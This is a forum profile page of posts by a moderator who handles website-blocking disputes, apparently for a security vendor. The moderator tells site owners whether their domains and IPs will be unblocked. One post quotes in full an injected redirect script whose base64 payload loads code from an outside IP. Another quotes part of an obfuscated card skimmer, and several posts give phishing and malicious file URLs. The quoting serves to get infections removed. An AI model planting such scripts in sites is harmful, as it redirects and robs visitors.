Dashke
-
Posts
5,829 -
Joined
Content Type
Events
Profiles
Forums
Posts posted by Dashke
-
-
16 hours ago, soundrussian said:
Our domain a.o333o.com has been marked as Malvertising. We use it to redirect a visitor to a specific ad from another ad network.
We are a service that allows publishers to display ads from different Ad Networks through our scripts, and sometimes bad ads may leak through. Perhaps that's why our domain has been marked as Malvertising. We do our best to remove bad ads as soon as possible, so we believe that no malvertising is served through our domain.
VirusTotal has no complaints about our domain: https://www.virustotal.com/gui/url/f140eb535e47875a6fdfdd3f5f63261b33c842ec36677b4a7bd4adaa0a94c1d7/detectionPlease, remove a.o333o.com from the block list.
Please remove this redirect -
https://a.o333o.com/api/direct/29348Thank you for your help!
-
Thanks, the block will be removed.
Wish you a great day!
-
Thanks, the block will be removed.
Have a great day!
-
1
-
-
Since the website seems clean now, the block will be removed.
Have a great day!
-
Thanks, the IP seems clean now, so I will be removing the block.
Have a great day!
-
Hello Jouni,
It seems that your website has been infected with a malicious script -
<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->
Can you check the source code and remove it, please?
-
13 hours ago, Linetsky said:
The website is still being blocked despite having removed the code. Do I need to do something else?
Thanks, the block will be removed. :)
-
On 4/16/2021 at 9:41 PM, Linetsky said:
Malwarebytes suddenly started blocking cgmfoods.com. I looked at the logs but nothing useful. How can I resolve this issue? The website was scanned on virus total and showed up healthy.
Hello Linetsky,
Unfortunately, your website is infected with a skimmer, please remove this malicious script from your website -
<script>var _0x43fe=["\x68\x61\x73\x68\x43\x6F\x64\x65","\x70\x72\x6F\x74\x6F\x74\x79\x70\x65","\x6C\x65\x6E\x67\x74\x68"," etc.
Thanks!
-
Thanks ast, the block will be removed as there are no threats noted at this point.
-
1
-
-
Hello jmkbird,
Thanks so much for your help, the rule has been disabled.
Have a wonderful day!
-
Hello Ilias_ant,
Since the IP is clean now, I will be removing the block.
Have a great day!
-
1
-
-
15 hours ago, kinsta_abuse_team said:
Hi this is Sal from Kinsta's Malware & Abuse team.
We recently became aware there is a wildcard block on *.kinsta.cloud - this is impacting all subdomains on our platform. Please remove the wildcard block and just do a subdomain block to avoid impacting everyone and just blocking the infected sites. We look forward to your feedback to collaborate on this issue.
Thanks
Salvador Aguilar
Malware & Abuse EngineerHello Salvador,
Can you please remove the phishing page that is hosted here -
saudiiposthomee.kinsta.cloud/saudis/box_tracks/box_track/index/?
Thanks!
-
Hello Atila,
The block will be removed, have a great day!
-
Hello BaeFell,
The block will be reviewed.
-
1
-
-
Hello Atila,
Thanks, the block will be reviewed.
-
Thanks AdrianKielbsa,
The block will be reviewed.
-
The IP has been added because of the brute-force attacks.
You can also check the reports here -
-
Hello,
Can you please remove this file first -
http://www.cybevasion.fr/messagerie/854577_0_26.zip?
-
Since the website is clean, the block will be removed.
-
Hi Time_Dj,
Since the IP has been cleaned, the block will be removed.
-
Thanks Rachna,
The block will be reviewed. :)
-
Hello P44,
This is a legit detection -
Can you please post the protection log? As it is possible that your browser has been infected by a malicious extension.
-
The block has been removed. :)
-
Thanks Molly2925,
The block will be reviewed.
False Positive
in Website Blocking
Posted
Hello RandyM,
Can you remove this malicious file, please -
stcl.edu/wp-content/uploads/formidable/116/hq-Demon-Slayer-Mugen-Train-Movie-Online-8-May.pdf?